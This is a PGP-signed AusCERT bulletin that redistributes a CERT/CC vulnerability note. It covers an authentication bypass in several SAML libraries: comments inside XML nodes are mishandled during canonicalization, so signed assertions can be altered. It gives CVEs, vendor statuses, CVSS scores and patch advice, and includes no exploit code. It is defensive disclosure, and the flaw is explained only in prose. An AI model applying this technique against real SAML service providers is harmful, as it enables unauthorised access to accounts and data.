-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2018.0571
        Multiple SAML libraries may allow authentication bypass via
             incorrect XML canonicalization and DOM traversal
                             28 February 2018

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           python-saml
                   ruby-saml
                   saml2-js
                   omniauth-saml
                   Shibboleth openSAML
Publisher:         CERT/CC
Operating System:  Windows
                   UNIX variants (UNIX, Linux, OSX)
                   Apple iOS
                   Android
Impact/Access:     Access Privileged Data         -- Remote/Unauthenticated
                   Provide Misleading Information -- Remote/Unauthenticated
Resolution:        Patch/Upgrade
CVE Names:         CVE-2018-0489 CVE-2017-11430 CVE-2017-11429
                   CVE-2017-11428 CVE-2017-11427 

Original Bulletin: 
   https://www.kb.cert.org/vuls/id/475445

Comment: This advisory affects multiple libraries implementing SAML, which
         will have different patch schedules.

- --------------------------BEGIN INCLUDED TEXT--------------------

Vulnerability Note VU#475445

Multiple SAML libraries may allow authentication bypass via incorrect XML
canonicalization and DOM traversal

Original Release date: 27 Feb 2018 | Last revised: 27 Feb 2018

Overview

Multiple SAML libraries may incorrectly utilize the results of XML DOM
traversal and canonicalization APIs in such a way that an attacker may be able
to manipulate the SAML data without invalidating the cryptographic signature,
allowing the attack to potentially bypass authentication to SAML service
providers.

Description

CWE-287: Improper Authentication

Security Assertion Markup Language (SAML) is an XML-based markup language for
security assertions regarding authentication and permissions, most commonly
used for single sign-on (SSO) services.

Some XML DOM traversal and canonicalization APIs may be inconsistent in
handling of comments within XML nodes. Incorrect use of these APIs by some SAML
libraries results in incorrect parsing of the inner text of XML nodes such that
any inner text after the comment is lost prior to cryptographically signing the
SAML message. Text after the comment therefore has no impact on the signature
on the SAML message.

A remote attacker can modify SAML content for a SAML service provider without
invalidating the cryptographic signature, which may allow attackers to bypass
primary authentication for the affected SAML service provider

The following CVEs are assigned:

CVE-2017-11427 - OneLogin's "python-saml"
CVE-2017-11428 - OneLogin's "ruby-saml"
CVE-2017-11429 - Clever's "saml2-js"
CVE-2017-11430 - "OmniAuth-SAML"
CVE-2018-0489 - Shibboleth openSAML C++

More information is available in the researcher's blog post. 


Impact

By modifying SAML content without invalidating the cryptographic signature, a
remote, unauthenticated attacker may be able to bypass primary authentication
for an affected SAML service provider.


Solution

Apply updates

Affected SAML service providers should update software to utilize the latest
releases of affected SAML libraries. Please see the vendor list below for more
information.


Vendor Information (Learn More)

                 Vendor                     Status        Date     Date Updated
                                                        Notified
Clever, Inc.                             Affected     24 Jan 2018  26 Feb 2018
Duo Security                             Affected     -            22 Feb 2018
OmniAuth                                 Affected     24 Jan 2018  06 Feb 2018
OneLogin Inc                             Affected     24 Jan 2018  27 Feb 2018
Shibboleth Consortium                    Affected     24 Jan 2018  06 Feb 2018
AssureBridge                             Not Affected -            27 Feb 2018
Okta Inc.                                Not Affected 29 Jan 2018  27 Feb 2018
Box                                      Unknown      23 Feb 2018  23 Feb 2018
Cisco                                    Unknown      23 Feb 2018  23 Feb 2018
Danish e-Infrastructure Cooperation      Unknown      24 Jan 2018  24 Jan 2018
(WAYF)
Entr'ouvert                              Unknown      24 Jan 2018  24 Jan 2018
GitHub                                   Unknown      24 Jan 2018  24 Jan 2018
Google                                   Unknown      23 Feb 2018  23 Feb 2018
Microsoft                                Unknown      23 Feb 2018  23 Feb 2018
Pivotal Software, Inc.                   Unknown      24 Jan 2018  24 Jan 2018

If you are a vendor and your product is affected, let us know.

CVSS Metrics (Learn More)

    Group     Score             Vector
Base          6.3   AV:N/AC:M/Au:S/C:C/I:N/A:N
Temporal      4.9   E:POC/RL:OF/RC:C
Environmental 4.9   CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND

References

  * https://duo.com/blog/
    duo-finds-saml-vulnerabilities-affecting-multiple-implementations
  * https://duo.com/labs/psa/duo-psa-2017-003
  * https://shibboleth.net/community/advisories/secadv_20180112.txt
  * https://cwe.mitre.org/data/definitions/287.html

Credit

Thanks to Kelby Ludwig of Duo Security for reporting this vulnerability.

This document was written by Garret Wassermann.

Other Information

  * CVE IDs: CVE-2017-11427 CVE-2017-11428 CVE-2017-11429 CVE-2017-11430
    CVE-2018-0489
  * Date Public: 27 Feb 2018
  * Date First Published: 27 Feb 2018
  * Date Last Updated: 27 Feb 2018
  * Document Revision: 67

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBWpYBLox+lLeg9Ub1AQghfA//RJAcK3ftBIqPIuswbbDUHTF82VL6HAlt
k1sjd/waKWDw+WFFWJPwy/roTO5nNKYrdO/1daAQB9DbiUzXpFPe1A/19a9BwCy9
lV/pNL6xWN2d+mZCguyqnSz+efUxab/HBxm301DQdaQ0KgQDlA6szlZAxOPuIkYN
dtNPT/5crmiHW0Nd83Q1j5KPY/K22NnrSIhy6+e93se75kE29tTbRI3s4kB43AM1
J/RncFEXiSPNKolTO+eu1dQfJ1o6lAbLqJ/EHEMgYqQ7QK+htK8uZc7uwPL7BodQ
FA1f8aER01C6TZUIlC7Q4SW1KBURnfdl3+m5Z8HM3hOKmybe03vqY9L5bWvhVLsV
b5LUtDS5A2OU+xFrTm8L6nYcGcriC8AxE29HReP4VvCjuQv28SzSPUhaQPys2eIL
9Q29ZI8WgoQxXujJeiM6BVBqKGdJ0ucy8s6dx6lytrV4my0uqzUPkGixE2Yj6e76
zED0eXbKNAX4yQx10lomnAnEj+zOhvQr5VXy+3Aymb9SDmkVuo8qVqTpNFrqfiOt
2TkZasC5jilaP3hTdujfriuqH8708VHWBXqlIWnxZ0bTU8isRxOxx7hV5Bj02NuQ
2kUoMuSdN3Xp7JlPXmWMaYXtj61EFPS7kV3D10JMbaSG/eYFcHBefJC2bZyexkfQ
sfeP1813XFg=
=5ePt
-----END PGP SIGNATURE-----